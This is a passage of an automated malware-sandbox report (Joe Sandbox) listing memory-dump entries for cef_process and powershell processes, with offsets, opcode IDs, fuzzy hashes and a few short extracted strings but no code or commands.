                                                                  • Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2e650a8d2c2efb6c4bbfd2e5fde46acf0fa530788f8a240de8ef7b0c8caf7b3e
                                                                  • Instruction ID: f2fcdb969d30faf65d0e5d7178d2568614b73c6398184a7e1dff99b24e482e80
                                                                  • Opcode Fuzzy Hash: 2e650a8d2c2efb6c4bbfd2e5fde46acf0fa530788f8a240de8ef7b0c8caf7b3e
                                                                  • Instruction Fuzzy Hash: CD01A532A0A609DBF7709B6544082BA79F5EF56351F004539E00EFF591DE6EA80982C1
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 53edcc39cc174a10870f78ee107120b0add98c8133d3b6e413ad753c38847366
                                                                  • Instruction ID: f3400496efb90c30ac3f4d7085f901eb573d495c01ea2ec2c1fd5c76eadab081
                                                                  • Opcode Fuzzy Hash: 53edcc39cc174a10870f78ee107120b0add98c8133d3b6e413ad753c38847366
                                                                  • Instruction Fuzzy Hash: 87012D30E0BA5ACBF7719B2848082BD7A91EF46340F01457AE00EE7690CD2EAC0D83C1
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ed9a86ca7acc2a3e8d36766daf3df7607e2314c62a7c6a8374379a408cb01eea
                                                                  • Instruction ID: 8d7c077e2897c102344b0d0c3e57ebe7fa2879a7ddd065069bbd2a6d98f38c7b
                                                                  • Opcode Fuzzy Hash: ed9a86ca7acc2a3e8d36766daf3df7607e2314c62a7c6a8374379a408cb01eea
                                                                  • Instruction Fuzzy Hash: 0A01E13290EA499FF360DB6548087A97EF5EF66350F00407AD00EEF291DE2EE8098391
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d8cdafbb1a9b56f159879f4d739b3cb242df228477a04273c7b0993334768903
                                                                  • Instruction ID: 15f98352ca945b6119a17b18c905dec1f8eced3ba2242b0e245faa3267872094
                                                                  • Opcode Fuzzy Hash: d8cdafbb1a9b56f159879f4d739b3cb242df228477a04273c7b0993334768903
                                                                  • Instruction Fuzzy Hash: 4911C2B1D19A498FEB98EF6888557A87BA0FF46301F4441A8D04ED7196CA29A8098780
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 295983094a166fcc9ad0143c12c9829eeb8a832d45dce536389826a54c019d0a
                                                                  • Instruction ID: 489dddf57a769ca693203a9c22610a69532fd57d847ae164d58cc1e1867481d0
                                                                  • Opcode Fuzzy Hash: 295983094a166fcc9ad0143c12c9829eeb8a832d45dce536389826a54c019d0a
                                                                  • Instruction Fuzzy Hash: A201DB70908A5D8FDB98EF58C454AACB7B1FB69300F04407AD00ED7691CA759980CB41
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1ae9dbc7d817723117abe79afd63901f5d0ab7e4ee6c51374f5fe4136464a6d2
                                                                  • Instruction ID: b06f894ab068bc452821606bdef543599a861eb32214bf223bd53907a9db383c
                                                                  • Opcode Fuzzy Hash: 1ae9dbc7d817723117abe79afd63901f5d0ab7e4ee6c51374f5fe4136464a6d2
                                                                  • Instruction Fuzzy Hash: 13F0DB51C0EA86CBFB9C9F6480115742791EF45300B4882B6D40FC69E3DE1EE84847D2
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8a730e79020a03aff2048b43ddfa8f0daaaa826fc0094571f8d31df5dc4b6155
                                                                  • Instruction ID: e3a67ac903354b25bb3e16530eedbb9dfc735789b9ebd1a5faa9081b0ee5f832
                                                                  • Opcode Fuzzy Hash: 8a730e79020a03aff2048b43ddfa8f0daaaa826fc0094571f8d31df5dc4b6155
                                                                  • Instruction Fuzzy Hash: 75F0623244E2C59FE7169F7088154F97FA4EF43214B1880E6D459870A2C52E565AC791
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d2f4cb909e665083e400ec4b78301ee3b73eb7436f057f3d22606a7f87bdcaba
                                                                  • Instruction ID: c52c546f3a8d6cbc1ffa6107c32d500c15bae79fa1c3d2dadaafb16e60331665
                                                                  • Opcode Fuzzy Hash: d2f4cb909e665083e400ec4b78301ee3b73eb7436f057f3d22606a7f87bdcaba
                                                                  • Instruction Fuzzy Hash: D4F08270B08D488FE7D8DB28851963D36D2EF59241B5405BE948ED32A6CE29DC414781
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d22a8e422b156d5809998a2f26626c4b4fdbf4edca1dfab634183af3fc6a9455
                                                                  • Instruction ID: c3ec923c845dac6d9bf16893d3545e25030aafbdb39fd66301f72297b54c208c
                                                                  • Opcode Fuzzy Hash: d22a8e422b156d5809998a2f26626c4b4fdbf4edca1dfab634183af3fc6a9455
                                                                  • Instruction Fuzzy Hash: 1901CC74A1992DCFDFA9DF08C894BA8B7B1FB69301F1441DA800EE3650DB75AA84CF45
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 79dbc162256735b64d115db60dc12a59de3102a85a06c624575d651a6ec27334
                                                                  • Instruction ID: 47889b066260e9a71bba71e0a53674814d294c1108a225d77a7a162e3489c806
                                                                  • Opcode Fuzzy Hash: 79dbc162256735b64d115db60dc12a59de3102a85a06c624575d651a6ec27334
                                                                  • Instruction Fuzzy Hash: 6FF0BE1190E887CEFA654F2454262B82A80EF03344F64847AC54E879D2C91EEB1E43D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: efb78616005b53ba5933f15ec823d510c1d9bf7b8e3bb7679ad31261b85ab07a
                                                                  • Instruction ID: 7963ab5663d5b64608cc3f26b3ccb8a5bb82b6724bfd5f3c86dbc9cb2d4fc757
                                                                  • Opcode Fuzzy Hash: efb78616005b53ba5933f15ec823d510c1d9bf7b8e3bb7679ad31261b85ab07a
                                                                  • Instruction Fuzzy Hash: EFE09A3580EB88CFEB61CF1088560EC7F20BF52300F1842E6D50D06182DB2AAA0C9282
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 61a40d3cf6e15dab64fccae4e4d47597c5b5d6015f0e832f2ad277dff738981f
                                                                  • Instruction ID: 99393b259f7bef76a6e70a46048505929a03ed23950cdf56771d5ee7d58ed914
                                                                  • Opcode Fuzzy Hash: 61a40d3cf6e15dab64fccae4e4d47597c5b5d6015f0e832f2ad277dff738981f
                                                                  • Instruction Fuzzy Hash: 1BD09220E0E603C5F2696F4181603396A905F13741F2084BAD05F6A8C5C96EF5096281
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1614913483.00007FFAAC730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC730000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ffaac730000_cef_process.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 1_^
                                                                  • API String ID: 0-1199027470
                                                                  • Opcode ID: c26549289faf5a992743cc7893fddfe93a75d7ebd3a238b3c29e3dcf7cdc9182
                                                                  • Instruction ID: 90c715f21f70f4d489e21df3423071cb097b45b166b4a230e3e770f461c5637c
                                                                  • Opcode Fuzzy Hash: c26549289faf5a992743cc7893fddfe93a75d7ebd3a238b3c29e3dcf7cdc9182
                                                                  • Instruction Fuzzy Hash: 43C104D292EBC2DBF355476CC94A074BFB1FF1321472881BAD09D86197EE28E90987D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1614913483.00007FFAAC730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC730000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ffaac730000_cef_process.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e5fdd902f20e0b82ddea79eaf741ec22710b95cc2ab38ab234bde6eeadc6dcfc
                                                                  • Instruction ID: 52bc3c355111153d24292c0f7723d819682602d613b8e71f1370a7793ce5b30f
                                                                  • Opcode Fuzzy Hash: e5fdd902f20e0b82ddea79eaf741ec22710b95cc2ab38ab234bde6eeadc6dcfc
                                                                  • Instruction Fuzzy Hash: 6D31D170D18A1DCFCF88DF98D491AEDBBF1FB69300F20516AD419E7281CA35A945CB84
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2577759140.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffaac630000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: X75]
                                                                  • API String ID: 0-3107120315
                                                                  • Opcode ID: a48d398300cd834a50f0d9afb055e60befd9d8cd7839b9730e36d2cd3b60cd62
                                                                  • Instruction ID: c8931e9736fa68b1f3c654929c7a92be42342c6029d7b9a585e47d4773eb24fa
                                                                  • Opcode Fuzzy Hash: a48d398300cd834a50f0d9afb055e60befd9d8cd7839b9730e36d2cd3b60cd62
                                                                  • Instruction Fuzzy Hash: FFD1456690EACA8FF756D72888199B97FE0FF46250B0451FED44EC71D3DA28D809C391
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2569130407.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffaac560000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d4a86b02a8ec8f3b6be006b4bc8e2c8b33451c61758d0d758f2bae8e442ddbdc
                                                                  • Instruction ID: 2ebc9551cf511979ed2fa53eaf01fd7b0bbd6635864cedfa4681fd4b67da2a40
                                                                  • Opcode Fuzzy Hash: d4a86b02a8ec8f3b6be006b4bc8e2c8b33451c61758d0d758f2bae8e442ddbdc
                                                                  • Instruction Fuzzy Hash: F3812CA3D4E683CBF712576C98A60F9BF64EF12325B0C40B2E1CD86053FD19A51A97C2
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2569130407.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffaac560000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 94224b2b98247beff5d747501950f0bd26ffed38df78a0e88328eb28f3bd8880
                                                                  • Instruction ID: ffdc628f900e7542f7d8da9fdc8726c1a091010fc96e0e6c04485eea6e0335c2
                                                                  • Opcode Fuzzy Hash: 94224b2b98247beff5d747501950f0bd26ffed38df78a0e88328eb28f3bd8880
                                                                  • Instruction Fuzzy Hash: BD412D7190DB498FEB58AF5CAC066F9BBE1FB96310F04816FE04DC3252DA24E85587C2
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2569130407.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffaac560000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6687b8dac69fd1a6614a9833e85c3c20f9eb506cb714bbcffd23f0027f7690a3
                                                                  • Instruction ID: 687e1abf91da9734c82d81554fae91fc1c6495366ca21473b0f92fca0266d1a0
                                                                  • Opcode Fuzzy Hash: 6687b8dac69fd1a6614a9833e85c3c20f9eb506cb714bbcffd23f0027f7690a3
                                                                  • Instruction Fuzzy Hash: CB31793190DB888FEB58DBAC9C056E9BBE0EF96320F0441BFD04DC7152C9249849CB82
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2561896607.00007FFAAC44D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC44D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffaac44d000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 685c0780432ba9924086eecb3106dab95174667dd86d87fffcd1caf7681602b3
                                                                  • Instruction ID: 57ba327d8d86d61847103d81a493d3096c817daf151760e7013e83822ab92b52
                                                                  • Opcode Fuzzy Hash: 685c0780432ba9924086eecb3106dab95174667dd86d87fffcd1caf7681602b3
                                                                  • Instruction Fuzzy Hash: 3041247140EBC48FE7568B38D8459523FF0EF53224B2905EFD089CB1A3D625E84AC796
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2569130407.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffaac560000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                  • Instruction ID: 23306aa872b8654059e46dc98aba13863009447ff91d1f8f1bd030fded881b3a
                                                                  • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                  • Instruction Fuzzy Hash: 0801677115CB0D8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3661DA36E882CB45
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2577759140.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffaac630000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 62e8724fa325c6878d37ead8a7f74c661d74a19561c2a2471a6c18e8e2e16ff0
                                                                  • Instruction ID: b6fdf222943b888091f6f502e5eca47870960adda5bf37e8f5659c8428fd090a
                                                                  • Opcode Fuzzy Hash: 62e8724fa325c6878d37ead8a7f74c661d74a19561c2a2471a6c18e8e2e16ff0
                                                                  • Instruction Fuzzy Hash: 55F0BE32A0D9448FE759EB5CE4458B8BBE0EF5532071190FAE05DC76A3CE25EC45C780
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2577759140.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffaac630000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f558fe848ba76e8d065c1ebceaff1d4cd8b12b6090f75141189ff63345f6ea61
                                                                  • Instruction ID: ca4c1692bbec655d2f459058a6f84a385e460deb83dc23067fbe2c099781ad55
                                                                  • Opcode Fuzzy Hash: f558fe848ba76e8d065c1ebceaff1d4cd8b12b6090f75141189ff63345f6ea61
                                                                  • Instruction Fuzzy Hash: D0F0E232A0D5848FE755EB1CE4458A8BBE0FF05320B5190F6E04DC7563DE25EC54C790
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2577759140.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffaac630000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction ID: 3b624ada25fce03167e5eebe06f4551e21686fbd26d2eb1f1923758689c3ff89
                                                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction Fuzzy Hash: F8E01A31B0C808CFEAA9DB0CE0409B9B7E1EB9932171161B7D14EC7661CA22EC559BC0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2569130407.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffaac560000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: N_^$N_^$N_^$N_^
                                                                  • API String ID: 0-3900292545
                                                                  • Opcode ID: 39f7a8b0d574857e5aedf2c17ebef44c4d85df572d9433501568e9199242ab80
                                                                  • Instruction ID: 637ae9e2cb6a99cf7bc6f1e3da3d3e90c004aebac2f2431168dac58c2cbc9f42
                                                                  • Opcode Fuzzy Hash: 39f7a8b0d574857e5aedf2c17ebef44c4d85df572d9433501568e9199242ab80
                                                                  • Instruction Fuzzy Hash: 1B916187E4E7C39AF75A032C58760B4AFD49F6321971D41F6E1CC4B093DB58A44E8391
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2569130407.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffaac560000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: N_^$N_^$N_^$N_^
                                                                  • API String ID: 0-3900292545
                                                                  • Opcode ID: e92157bcb0ec907eb05547fe0827964611eac4710ffc337572c0633da5e67083
                                                                  • Instruction ID: 8f998b094cfcb03cbfcdb8f6aeb047906cdf4ea734171ee36c95a294e9e799d2
                                                                  • Opcode Fuzzy Hash: e92157bcb0ec907eb05547fe0827964611eac4710ffc337572c0633da5e67083
                                                                  • Instruction Fuzzy Hash: 575196A294F7C38BF35A436858651E5BFE4EF13324B0D41F6E58D8B093EE19A44A4382
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2569130407.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffaac560000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: N_^4$N_^7$N_^F$N_^J
                                                                  • API String ID: 0-3508309026
                                                                  • Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                  • Instruction ID: 25d616254ea908bae9976e55c3b59c31fd8d590baadc242b8ce4c8a183402ff0
                                                                  • Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                  • Instruction Fuzzy Hash: 102104B7A080254FD3017BBCEC24DE93B50DB9823474942B2D299CB253ED1471CA8EC2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2556204527.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffaac650000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: X7<[
                                                                  • API String ID: 0-2173958855
                                                                  • Opcode ID: e520f241e47f38420d2bf8fcc01d63ad2a7e1f68a098a33a2576304261e76416
                                                                  • Instruction ID: 453e07a5961a6a4dd917e7b03ac04bb3d0ce3b8a9770d50fbce80a2456b011d1
                                                                  • Opcode Fuzzy Hash: e520f241e47f38420d2bf8fcc01d63ad2a7e1f68a098a33a2576304261e76416
                                                                  • Instruction Fuzzy Hash: 98D1576690EB8E8FF756D72888555B97FA0EF46310B2851FEE04DC71D3DA28D809C391
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2547651379.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffaac580000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9ef85b35aeb583491f99ada6bb68291d4de9e05818a99f019ae6eec6fbbca7da
                                                                  • Instruction ID: e3d2c55c672d8c6a39a278c574a9752834f0b0e0016bc06fedefac6860044945
                                                                  • Opcode Fuzzy Hash: 9ef85b35aeb583491f99ada6bb68291d4de9e05818a99f019ae6eec6fbbca7da
                                                                  • Instruction Fuzzy Hash: 3CD14970A1CB498FE749EB2CC8856B57BE5EF56311F10417EE08EC32A7DA25E846C781
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2547651379.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffaac580000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1d25e4f59225c2cc6734ff1647aa42c7072398951852f5eb5c7b0ccfb4274c1e
                                                                  • Instruction ID: c697aaa7d515f160561b30dff4e694fb339e79cffa0248e93ac6e92887dd267d
                                                                  • Opcode Fuzzy Hash: 1d25e4f59225c2cc6734ff1647aa42c7072398951852f5eb5c7b0ccfb4274c1e
                                                                  • Instruction Fuzzy Hash: C9811DA3D4EB83CBF706976C98661F93BA4EF52315F088076E08D46053FD19A61E5BC2
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2547651379.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffaac580000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fca0548d65b6e2e20e819c18d78b389152ab1364f2a045569f3c43f6b423af65
                                                                  • Instruction ID: 96e96dc557143a6cb3cf3f6467092d88941b5a91206e9f7f70b3e1528cee9d24
                                                                  • Opcode Fuzzy Hash: fca0548d65b6e2e20e819c18d78b389152ab1364f2a045569f3c43f6b423af65
                                                                  • Instruction Fuzzy Hash: 83412B7190CB499FEB58AF5CAC466F87BE1FB95310F04816FE04DD3252DA20A9558BC2
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2537064463.00007FFAAC46D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC46D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffaac46d000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9c4e1c2ab070f49e3c27c91de57f35e0c06e5f42ab6192bef644726036bdbfd0
                                                                  • Instruction ID: e363e584a9ac8fbe255642b6b9feeae14739434bda26b2e5f80bddd9abd7b7e7
                                                                  • Opcode Fuzzy Hash: 9c4e1c2ab070f49e3c27c91de57f35e0c06e5f42ab6192bef644726036bdbfd0
                                                                  • Instruction Fuzzy Hash: C4413B7140EBC49FE75A8B289855A527FF0EF53314B1901DFE088CB197D625E80AC7D2
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2547651379.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffaac580000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 749563f419819850808ac2b7323902100547ee51120455f12beae56beba39b1f
                                                                  • Instruction ID: 1ce3309a3258698c77acd1a934b1dd5e9fd8776a9a3446389a18c2b90e62ff75
                                                                  • Opcode Fuzzy Hash: 749563f419819850808ac2b7323902100547ee51120455f12beae56beba39b1f
                                                                  • Instruction Fuzzy Hash: F301677115CB0D8FD744EF0CE451AB5B7E0FB95364F10056DE58AC3661DA36E882CB45
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2556204527.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffaac650000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 51f5b6043e0f82a35d0669c7f88ae01ab06a18875b261606dbeffe2eef191ee6
                                                                  • Instruction ID: 385ec90054a036e6d5f2a5a70f95f0abaf044e9a75f89d9ec4f173268e8e308b
                                                                  • Opcode Fuzzy Hash: 51f5b6043e0f82a35d0669c7f88ae01ab06a18875b261606dbeffe2eef191ee6
                                                                  • Instruction Fuzzy Hash: 28F09A32A4D5088FE769EB5CE4458A877E0EF55320B2190FAE05DC75A3CE25EC45C780
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2556204527.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffaac650000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e18fa7b76d0c06402f587efd2377e5a20668f99f011e42b50fea2fee2c6266bb
